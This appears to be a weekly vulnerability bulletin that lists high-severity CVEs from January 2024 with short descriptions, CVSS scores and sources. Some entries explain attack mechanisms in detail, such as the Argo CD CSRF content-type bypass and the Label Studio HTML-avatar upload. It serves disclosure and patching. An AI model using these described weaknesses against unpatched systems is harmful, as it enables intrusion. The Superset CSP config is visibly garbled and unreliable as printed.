Vulnerability Summary for the Week of January 22, 2024

Posted by:

|

On:

|

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
60indexpage — 60indexpage
 
A vulnerability classified as critical has been found in 60IndexPage up to 1.8.5. This affects an unknown part of the file /include/file.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252189 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 7.3 CVE-2024-0945
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
60indexpage — 60indexpage
 
A vulnerability classified as critical was found in 60IndexPage up to 1.8.5. This vulnerability affects unknown code of the file /apply/index.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-26 7.3 CVE-2024-0946
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
actidata — actinas_sl_2u-8_rdx_firmware Improper access control on nasSvr.php in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to read and modify different types of data without authentication. 2024-01-19 9.1 CVE-2023-51947
cve@mitre.org
cve@mitre.org
cve@mitre.org
actidata — actinas_sl_2u-8_rdx_firmware A Site-wide directory listing vulnerability in /fm in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to list the files hosted by the web application. 2024-01-19 7.5 CVE-2023-51948
cve@mitre.org
cve@mitre.org
anomali — match Anomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3. 2024-01-19 7.2 CVE-2023-49329
cve@mitre.org
cve@mitre.org
apache_software_foundation — apache_superset
 
A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS. For 2.X versions, users should change their config to include: TALISMAN_CONFIG = {     “content_security_policy”: {         “base-uri”: [“‘self’”],         “default-src”: [“‘self’”],         “img-src”: [“‘self’”, “blob:”, “data:”],         “worker-src”: [“‘self’”, “blob:”],         “connect-src”: [             “‘self’”,             ” https://api.mapbox.com” https://api.mapbox.com” ;,             ” https://events.mapbox.com” https://events.mapbox.com” ;,         ],         “object-src”: “‘none’”,         “style-src”: [             “‘self’”,             “‘unsafe-inline’”,         ],         “script-src”: [“‘self’”, “‘strict-dynamic’”],     },     “content_security_policy_nonce_in”: [“script-src”],     “force_https”: False,     “session_cookie_secure”: False, } 2024-01-23 9.6 CVE-2023-49657
security@apache.org
apple — ipados The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user. 2024-01-23 7.5 CVE-2024-23203
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — ipados The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user. 2024-01-23 7.5 CVE-2024-23204
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
product-security@apple.com
apple — macos The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3. Processing web content may lead to arbitrary code execution. 2024-01-23 8.8 CVE-2024-23209
product-security@apple.com
product-security@apple.com
apple — macos The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2. Processing a file may lead to unexpected app termination or arbitrary code execution. 2024-01-23 7.8 CVE-2023-42881
product-security@apple.com
argo– cd_api
 
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the “Lax” SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a “preflight request” for POSTs with content type “application/json” asking the destination API “are you allowed to accept requests from my domain?” If the destination API does not answer “yes,” the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser’s CORS check by setting the content type to something which is considered “not sensitive” such as “text/plain.” The browser wouldn’t send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2024-01-19 8.3 CVE-2024-22424
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
arris — surfboard_sbg6950ac2
 
An arbitrary code execution vulnerability exists in Arris SURFboard SGB6950AC2 devices. An unauthenticated attacker can exploit this vulnerability to achieve code execution as root. 2024-01-26 9.6 CVE-2024-23618
disclosures@exodusintel.com
asus– armoury_crate
 
ASUS Armoury Crate has a vulnerability in arbitrary file write and allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission. 2024-01-19 9.8 CVE-2023-5716
twcert@cert.org.tw
benbusby — whoogle-search
 
Whoogle Search is a self-hosted metasearch engine. In versions prior to 0.8.4, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a GET request on lines 339-343 in `request.py`, which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4. 2024-01-23 9.1 CVE-2024-22203
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
benbusby — whoogle-search
 
Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `window` endpoint does not sanitize user-supplied input from the `location` variable and passes it to the `send` method which sends a `GET` request on lines 339-343 in `request.py,` which leads to a server-side request forgery. This issue allows for crafting GET requests to internal and external resources on behalf of the server. For example, this issue would allow for accessing resources on the internal network that the server has access to, even though these resources may not be accessible on the internet. This issue is fixed in version 0.8.4. 2024-01-23 9.1 CVE-2024-22205
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
biges_safe_life_technologies_electronics_inc. — vguard
 
Path Traversal: ‘/../filedir’ vulnerability in Biges Safe Life Technologies Electronics Inc. VGuard allows Absolute Path Traversal.This issue affects VGuard: before V500.0003.R008.4011.C0012.B351.C. 2024-01-26 7.5 CVE-2023-6919
iletisim@usom.gov.tr
byzoro — smart_s150_firmware A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2024-01-19 9.8 CVE-2024-0712
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cisco — cisco_unified_contact_center_enterprise
 
A vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to the improper processing of user-provided data that is being read into memory. An attacker could exploit this vulnerability by sending a crafted message to a listening port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user. With access to the underlying operating system, the attacker could also establish root access on the affected device. 2024-01-26 9.9 CVE-2024-20253
ykramarz@cisco.com
clickhouse — java_libraries Exposure of sensitive information in exceptions in ClichHouse’s clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when ‘sslkey’ is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message. 2024-01-19 8.8 CVE-2024-23689
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
crestron — am-300
 
There is an OS command injection vulnerability in Crestron AM-300 firmware version 1.4499.00018 which may enable a user of a limited-access SSH session to escalate their privileges to root-level access. 2024-01-23 8.4 CVE-2023-6926
ics-cert@hq.dhs.gov
d-link — dap-1650
 
A command injection vulnerability exists in the gena.cgi module of D-Link DAP-1650 devices. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root. 2024-01-26 9.6 CVE-2024-23624
disclosures@exodusintel.com
d-link — dap-1650
 
A command injection vulnerability exists in D-Link DAP-1650 devices when handling UPnP SUBSCRIBE messages. An unauthenticated attacker can exploit this vulnerability to gain command execution on the device as root. 2024-01-26 9.6 CVE-2024-23625
disclosures@exodusintel.com
dedecms — dedecms DedeCMS 5.7.112 has a File Upload vulnerability via uploads/dede/module_upload.php. 2024-01-22 8.8 CVE-2024-22895
cve@mitre.org
delhivery — delhivery_logistics_courier
 
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Delhivery Delhivery Logistics Courier. This issue affects Delhivery Logistics Courier: from n/a through 1.0.107. 2024-01-27 8.5 CVE-2024-22283
audit@patchstack.com
dell — networker_module_for_databases_and_applications_oracle
 
Networker 19.9 and all prior versions contains a Plain-text Password stored in temporary config file during backup duration in NMDA MySQL Database backups. User has low privilege access to Networker Client system could potentially exploit this vulnerability, leading to the disclosure of configured MySQL Database user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application Database with privileges of the compromised account. 2024-01-25 7.8 CVE-2024-22432
security_alert@emc.com
dexidp — dex
 
Dex is an identity service that uses OpenID Connect to drive authentication for other apps. Dex 2.37.0 serves HTTPS with insecure TLS 1.0 and TLS 1.1. `cmd/dex/serve.go` line 425 seemingly sets TLS 1.2 as minimum version, but the whole `tlsConfig` is ignored after `TLS cert reloader` was introduced in v2.37.0. Configured cipher suites are not respected either. This issue is fixed in Dex 2.38.0. 2024-01-25 7.5 CVE-2024-23656
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
dolibarr — dolibarr
 
Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Version 18.0.4 has a HTML Injection vulnerability in the Home page of the Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application’s response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS). To remediate the issue, validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks; and implement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML. 2024-01-25 7.1 CVE-2024-23817
security-advisories@github.com
dom96 — httpbeast An issue in dom96 HTTPbeast v.0.4.1 and before allows a remote attacker to execute arbitrary code via a crafted request to the parser.nim component. 2024-01-19 9.8 CVE-2023-50694
cve@mitre.org
cve@mitre.org
cve@mitre.org
dremio — dremio Dremio before 24.3.1 allows path traversal. An authenticated user who has no privileges on certain folders (and the files and datasets in these folders) can access these folders, files, and datasets. To be successful, the user must have access to the source and at least one folder in the source. Affected versions are: 24.0.0 through 24.3.0, 23.0.0 through 23.2.3, and 22.0.0 through 22.2.2. Fixed versions are: 24.3.1 and later, 23.2.4 and later, and 22.2.3 and later. 2024-01-22 8.8 CVE-2024-23768
cve@mitre.org
ejinshan — terminal_security_system File upload vulnerability in ejinshan v8+ terminal security system allows attackers to upload arbitrary files to arbitrary locations on the server. 2024-01-20 9.8 CVE-2021-31314
cve@mitre.org
embedchain — embedchain The OpenAPI loader in Embedchain before 0.1.57 allows attackers to execute arbitrary code, related to the openapi.py yaml.load function argument. 2024-01-21 9.8 CVE-2024-23731
cve@mitre.org
cve@mitre.org
embedchain — embedchain The JSON loader in Embedchain before 0.1.57 allows a ReDoS (regular expression denial of service) via a long string to json.py. 2024-01-21 7.5 CVE-2024-23732
cve@mitre.org
cve@mitre.org
enonic — xp Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes. 2024-01-19 9.8 CVE-2024-23679
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
fortra — goanywhere_mft
 
Authentication bypass in Fortra’s GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal. 2024-01-22 9.8 CVE-2024-0204
df4dee71-de3a-4139-9588-11b62fe6c0ff
df4dee71-de3a-4139-9588-11b62fe6c0ff
df4dee71-de3a-4139-9588-11b62fe6c0ff
foru_cms_project — foru_cms A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551. 2024-01-19 9.8 CVE-2024-0728
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
foru_cms_project — foru_cms A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552. 2024-01-19 9.8 CVE-2024-0729
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
freerdp — freerdp FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability. 2024-01-19 9.8 CVE-2024-22211
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
freesshd — freesshd A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547. 2024-01-19 7.5 CVE-2024-0723
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
garethhk — mldong A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability. 2024-01-19 9.8 CVE-2024-0738
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gitlab — gitlab
 
An issue has been discovered in GitLab CE/EE affecting all versions from 16.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 which allows an authenticated user to write files to arbitrary locations on the GitLab server while creating a workspace. 2024-01-26 9.9 CVE-2024-0402
cve@gitlab.com
cve@gitlab.com
hewlett_packard_enterprise — hpe_oneview
 
HPE OneView may allow command injection with local privilege escalation. 2024-01-23 7.8 CVE-2023-50274
security-alert@hpe.com
hewlett_packard_enterprise — hpe_oneview
 
HPE OneView may allow clusterService Authentication Bypass resulting in denial of service. 2024-01-23 7.5 CVE-2023-50275
security-alert@hpe.com
hitron_systems — dvr_hvr-16781
 
Improper Input Validation in Hitron Systems DVR HVR-16781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. 2024-01-23 7.4 CVE-2024-22770
vuln@krcert.or.kr
hitron_systems — dvr_hvr-4781
 
Improper Input Validation in Hitron Systems DVR HVR-4781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. 2024-01-23 7.4 CVE-2024-22768
vuln@krcert.or.kr
hitron_systems — dvr_hvr-8781
 
Improper Input Validation in Hitron Systems DVR HVR-8781 1.03~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. 2024-01-23 7.4 CVE-2024-22769
vuln@krcert.or.kr
hitron_systems — dvr_lguvr-4h
 
Improper Input Validation in Hitron Systems DVR LGUVR-4H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. 2024-01-23 7.4 CVE-2024-22771
vuln@krcert.or.kr
hitron_systems — dvr_lguvr-8h
 
Improper Input Validation in Hitron Systems DVR LGUVR-8H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. 2024-01-23 7.4 CVE-2024-22772
vuln@krcert.or.kr
hitron_systems_dvr — dvr_lguvr-16h
 
Improper Input Validation in Hitron Systems DVR LGUVR-16H 1.02~4.02 allows an attacker to cause network attack in case of using default admin ID/PW. 2024-01-23 7.4 CVE-2024-23842
vuln@krcert.or.kr
humansignal — label-studio
 
Label Studio is an a popular open source data labeling tool. Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image. The file `users/functions.py` lines 18-49 show that the only verification check is that the file is an image by extracting the dimensions from the file. Label Studio serves avatar images using Django’s built-in `serve` view, which is not secure for production use according to Django’s documentation. The issue with the Django `serve` view is that it determines the `Content-Type` of the response by the file extension in the URL path. Therefore, an attacker can upload an image that contains malicious HTML code and name the file with a `.html` extension to be rendered as a HTML page. The only file extension validation is performed on the client-side, which can be easily bypassed. Version 1.9.2 fixes this issue. Other remediation strategies include validating the file extension on the server side, not in client-side code; removing the use of Django’s `serve` view and implement a secure controller for viewing uploaded avatar images; saving file content in the database rather than on the filesystem to mitigate against other file related vulnerabilities; and avoiding trusting user controlled inputs. 2024-01-23 7.1 CVE-2023-47115
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
ibm — db2 IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 federated server is vulnerable to a denial of service when a specially crafted cursor is used. IBM X-Force ID: 268759. 2024-01-22 7.5 CVE-2023-45193
psirt@us.ibm.com
psirt@us.ibm.com
ibm — db2 IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 is vulnerable to an insecure cryptographic algorithm and to information disclosure in stack trace under exceptional conditions. IBM X-Force ID: 270730. 2024-01-22 7.5 CVE-2023-47152
psirt@us.ibm.com
psirt@us.ibm.com
ibm — maximo_application_suite IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843. 2024-01-19 8.8 CVE-2023-47718
psirt@us.ibm.com
psirt@us.ibm.com
psirt@us.ibm.com
ibm — openpages_with_watson IBM OpenPages with Watson 8.3 and 9.0 could provide weaker than expected security in a OpenPages environment using Native authentication. If OpenPages is using Native authentication an attacker with access to the OpenPages database could through a series of specially crafted steps could exploit this weakness and gain unauthorized access to other OpenPages accounts. IBM X-Force ID: 262594. 2024-01-19 8.1 CVE-2023-38738
psirt@us.ibm.com
psirt@us.ibm.com
ibm — openpages_with_watson IBM OpenPages with Watson 8.3 and 9.0 could allow remote attacker to bypass security restrictions, caused by insufficient authorization checks. By authenticating as an OpenPages user and using non-public APIs, an attacker could exploit this vulnerability to bypass security and gain unauthorized administrative access to the application. IBM X-Force ID: 264005. 2024-01-19 8.8 CVE-2023-40683
psirt@us.ibm.com
psirt@us.ibm.com
ibm_merge_healthcare — _efilm_workstation
 
An improper privilege management vulnerability exists in IBM Merge Healthcare eFilm Workstation. A local, authenticated attacker can exploit this vulnerability to escalate privileges to SYSTEM. 2024-01-26 8.8 CVE-2024-23620
disclosures@exodusintel.com
ibm_merge_healthcare — efilm_workstation
 
A buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution. 2024-01-26 10 CVE-2024-23621
disclosures@exodusintel.com
ibm_merge_healthcare — efilm_workstation
 
A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges. 2024-01-26 10 CVE-2024-23622
disclosures@exodusintel.com
ibm_merge_healthcare — efilm_workstation
 
A hardcoded credential vulnerability exists in IBM Merge Healthcare eFilm Workstation. A remote, unauthenticated attacker can exploit this vulnerability to achieve information disclosure or remote code execution. 2024-01-26 9.8 CVE-2024-23619
disclosures@exodusintel.com
instawp_team — instawp_connec-1_click_wp_staging_&_migration
 
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration. This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9. 2024-01-27 7.7 CVE-2024-23506
audit@patchstack.com
intel — nuc_bios
 
Improper input validation for some Intel NUC BIOS firmware before version JY0070 may allow a privileged user to potentially enable escalation of privilege via local access. 2024-01-19 7.5 CVE-2023-28738
secure@intel.com
intel — nuc_bios
 
Improper input validation for some Intel NUC BIOS firmware before version QN0073 may allow a privileged user to potentially enable escalation of privilege via local access. 2024-01-19 7.5 CVE-2023-28743
secure@intel.com
intel — nuc_bios
 
Improper input validation for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access. 2024-01-19 7.5 CVE-2023-29495
secure@intel.com
intel — nuc_pro
 
Uncontrolled search path in some Intel NUC Pro Software Suite Configuration Tool software installers before version 3.0.0.6 may allow an authenticated user to potentially enable denial of service via local access. 2024-01-19 7.9 CVE-2023-32272
secure@intel.com
intel– hotkey
 
Improper access control in some Intel HotKey Services for Windows 10 for Intel NUC P14E Laptop Element software installers before version 1.1.45 may allow an authenticated user to potentially enable denial of service via local access. 2024-01-19 7.3 CVE-2023-32544
secure@intel.com
intel– nuc_8_compute_element_bios
 
Improper input validation in some Intel NUC 8 Compute Element BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. 2024-01-19 7.5 CVE-2023-42766
secure@intel.com
intel– nuc_bios
 
Improper input validation in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. 2024-01-19 7.5 CVE-2023-38587
secure@intel.com
intel– nuc_bios
 
Improper buffer restrictions in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access. 2024-01-19 7.5 CVE-2023-42429
secure@intel.com
jester_project — jester An issue in dom96 Jester v.0.6.0 and before allows a remote attacker to execute arbitrary code via a crafted request. 2024-01-19 9.8 CVE-2023-50693
cve@mitre.org
cve@mitre.org
cve@mitre.org
joommasters — jmssetting In the module “Jms Setting” (jmssetting) from Joommasters for PrestaShop, a guest can perform SQL injection in versions <= 1.1.0. The method `JmsSetting::getSecondImgs()` has a sensitive SQL call that can be executed with a trivial http call and exploited to forge a blind SQL injection. 2024-01-19 9.8 CVE-2023-50030
cve@mitre.org
cve@mitre.org
jsrsasign — jsrsasign
 
Versions of the package jsrsasign before 11.0.0 are vulnerable to Observable Discrepancy via the RSA PKCS1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting this vulnerability. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key. Workaround This vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library. 2024-01-22 7.5 CVE-2024-21484
report@snyk.io
report@snyk.io
report@snyk.io
report@snyk.io
report@snyk.io
report@snyk.io
juniper_networks — junos_os
 
An Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an attacker to construct a URL that when visited by another user enables the attacker to execute commands with the target’s permissions, including an administrator. A specific invocation of the emit_debug_note method in webauth_operation.php will echo back the data it receives. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S10; * 21.2 versions earlier than 21.2R3-S8; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3-S1; * 23.2 versions earlier than 23.2R2; * 23.4 versions earlier than 23.4R2. 2024-01-25 8.8 CVE-2024-21620
sirt@juniper.net
keycloak — keycloak
 
A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users. 2024-01-26 7.1 CVE-2023-6291
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
leadshop — leadshop A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability. 2024-01-19 9.8 CVE-2024-0739
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
lemmynet — lemmy
 
Lemmy is a link aggregator and forum for the fediverse. Starting in version 0.17.0 and prior to version 0.19.1, users can report private messages, even when they’re neither sender nor recipient of the message. The API response to creating a private message report contains the private message itself, which means any user can just iterate over message ids to (loudly) obtain all private messages of an instance. A user with instance admin privileges can also abuse this if the private message is removed from the response, as they’re able to see the resulting reports. Creating a private message report by POSTing to `/api/v3/private_message/report` does not validate whether the reporter is the recipient of the message. lemmy-ui does not allow the sender to report the message; the API method should likely be restricted to accessible to recipients only. The API response when creating a report contains the `private_message_report_view` with all the details of the report, including the private message that has been reported: Any authenticated user can obtain arbitrary (untargeted) private message contents. Privileges required depend on the instance configuration; when registrations are enabled without application system, the privileges required are practically none. When registration applications are required, privileges required could be considered low, but this assessment heavily varies by instance. Version 0.19.1 contains a patch for this issue. A workaround is available. If an update to a fixed Lemmy version is not immediately possible, the API route can be blocked in the reverse proxy. This will prevent anyone from reporting private messages, but it will also prevent exploitation before the update has been applied. 2024-01-24 7.5 CVE-2024-23649
security-advisories@github.com
security-advisories@github.com
lenovo — tab_m8_hd_tb8505f_firmware A privilege escalation vulnerability was reported in some Lenovo tablet products that could allow local applications access to device identifiers and system commands. 2024-01-19 7.8 CVE-2023-5080
psirt@lenovo.com
lenovo — vantage A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker to bypass integrity checks and execute arbitrary code with elevated privileges. 2024-01-19 7.8 CVE-2023-6043
psirt@lenovo.com
linux — kernel
 
A use-after-free flaw was found in the Linux Kernel due to a race problem in the unix garbage collector’s deletion of SKB races with unix_stream_read_generic() on the socket that the SKB is queued on. 2024-01-21 7 CVE-2023-6531
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
ls1intum — artemis_java_test_sandbox Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. 2024-01-19 8.2 CVE-2024-23681
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
ls1intum — artemis_java_test_sandbox Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. 2024-01-19 8.2 CVE-2024-23682
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
ls1intum — artemis_java_test_sandbox Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. 2024-01-19 8.2 CVE-2024-23683
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
mate-desktop — atril
 
Atril Document Viewer is the default document reader of the MATE desktop environment for Linux. A path traversal and arbitrary file write vulnerability exists in versions of Atril prior to 1.26.2. This vulnerability is capable of writing arbitrary files anywhere on the filesystem to which the user opening a crafted document has access. The only limitation is that this vulnerability cannot be exploited to overwrite existing files, but that doesn’t stop an attacker from achieving Remote Command Execution on the target system. Version 1.26.2 of Atril contains a patch for this vulnerability. 2024-01-25 8.5 CVE-2023-52076
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
